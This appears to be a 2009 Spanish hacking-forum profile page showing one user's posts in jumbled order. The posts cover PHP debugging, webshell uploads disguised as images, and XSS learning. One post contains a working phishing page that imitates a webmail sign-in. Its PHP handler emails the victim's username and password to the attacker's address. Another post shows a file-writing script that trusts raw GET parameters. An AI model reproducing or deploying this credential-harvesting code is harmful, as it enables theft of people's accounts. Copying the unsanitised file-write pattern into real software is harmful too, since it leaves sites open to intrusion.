el tipo de texto es dinamico o estatico?
recuerdo que en versiones pasadas me pasaba eso con el texto estatico
recuerdo que en versiones pasadas me pasaba eso con el texto estatico
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes Menú<html>
<head>
<meta>
<title>Untitled Document</title>
</head>
<body>
<form name='formulario' id='formulario' method='post' action='send.php' >
<table>
<tr>
<td valign="top" class="css0059" align="right"><label for="i0116">Dirección de correo electrónico:</label></td>
<td valign="top" class="css0093"><p><input name="usuario" id="usuario" type="text" maxlength="113" autocomplete="off" style="ime-mode:disabled" class="css0034" /></p></td>
<tr>
<td valign="top" class="css0059" align="right"><label for="i0118">Contraseña:</label></td>
<td valign="top" class="css0093"><p><input name="clave" type="password" maxlength="16" autocomplete="off" style="ime-mode:disabled" class="css0034" /></p><input name='submit' type="submit" value=" Iniciar sesión " class="css0088" /></td>
</tr>
</table>
</form>
</body>
</html>
<?php
if($_POST['usuario']!=NULL and $_POST['clave']!=NULL)
{
$to = "corrreo@dominio.com";
$subject = "Probando envio datos";
$usuario = "Usuario: " . $_POST['usuario'] . "\n";
$clave = "Clave: " . $_POST['clave'] . "\n";
mail($to, $subject, $usuario, $clave);
} else {
// aqui hiria lo que pasa si no se especifica nombre de usuacio o clave ¬¬
}
?>
Cita de: 50l3r en 1 Septiembre 2009, 02:38 AM
Veran, tengo una web dedicada al hosting de imagenes .gif .jpg y .png de maximo 5 megas
Segun mi cabeza, y aun asi ya visto en mi web, se puede subir a esta webshells c99 y demas con extension .jpg por ejemplo y dar ordenes desde estas
Como se repara este fallo de seguridad? aun nose si mi web es vulnerable, se algo de la vulnerabilidad pero no como protegerme
saludos
Cita de: WHK en 31 Agosto 2009, 06:54 AMCita de: WHK en 30 Agosto 2009, 19:14 PM<?php
$id = preg_replace('|[^A-Za-z0-9_-.]|i', '', $_GET['activity']).'.txt';
$id2 = $_GET['od'];
if(fole_exists($id))
$master = fopen($id.'.txt', 'a');
else
$master = fopen($id.'.txt', 'x');
fwrite($master, $id2."\x0D\x0A");
fclose($master);
?>
es file_exists no fole_exists<?php
$id = preg_replace('|[^A-Za-z0-9_-.]|i', '', $_GET['activity']).'.txt';
$id2 = $_GET['od'];
if(file_exists($id))
$master = fopen($id.'.txt', 'a');
else
$master = fopen($id.'.txt', 'x');
fwrite($master, $id2."\x0D\x0A");
fclose($master);
?>
if(file_exists($id))
if(file_exists($id.".txt"))
fwrite($master," ".$id2,"\n");
fwrite($master," ".$id2."\n");
Cita de: masterchop en 30 Agosto 2009, 08:41 AMen esta linea:
Buenas estaba utilizando el sitio web de miarroba no se si lo conocen y estaba haciendo un .PHP que creara archivos TXT con un nombre que yo quisiera y insertarle el texto que yo quiera por medio de la barra de direcciones
Codigo del Creador.PHP<?php
$id=$_GET['activity'];
$id2=$_GET['od'];
$master=fopen($id.'.txt',a);
fwrite($master," ".$id2,"\n");
fclose($master);
?>
Link:http://pagina.webcindario.com/Creador.php?activity=NuevoArchivo&od=Texto a insertar.
pero no me funciona es que acazo es una limitande de webcindario o tengo algo malo en el codigo???
Se les agradace!!
$master=fopen($id.'.txt',a);
$master=fopen($id.'.txt'."a");
<?php
$id=$_GET['activity'];
$id2=$_GET['od'];
$master=fopen($id.'.txt', "a");
fwrite($master, " ".$id2."\n");
fclose($master);
?>
Cita de: emma93 en 28 Agosto 2009, 03:01 AMCita de: WHK en 27 Agosto 2009, 23:04 PM
de hecho si se puede, si observas las peticiones xmlhttp de la función de la exploración de carpetas del costado, de todas formas si quieres divertirte aprendiendo es mejor que no vayas por ese lado y entres acá: http://warzone.elhacker.net/ , ahi hay pruebas de xss, sql inyección y todo bién documentadas, si quieres entretenerte aprendiendo usa ese porque asi como vas lo unico que sacarás es que despues gente de investigaciones anden visitando a tu casa como le pasó a alguien que conozco y de seguro debe estar leyendo esto también.
Aclaro por segunda vez, no intento hacer un deface ni nada por el estilo.
Nomás quería obtener mas información de XSS.
Nada más.
Saludos !
Cita de: Shell-killer en 27 Agosto 2009, 22:42 PMpues no es muy cara que digamos (eso creo, estoy hablando de pesos mexicanos [1MX = 1/19.91 Euro])
pues depende de si la usas o no XD y si con lo uqe hagas amortizas la inversion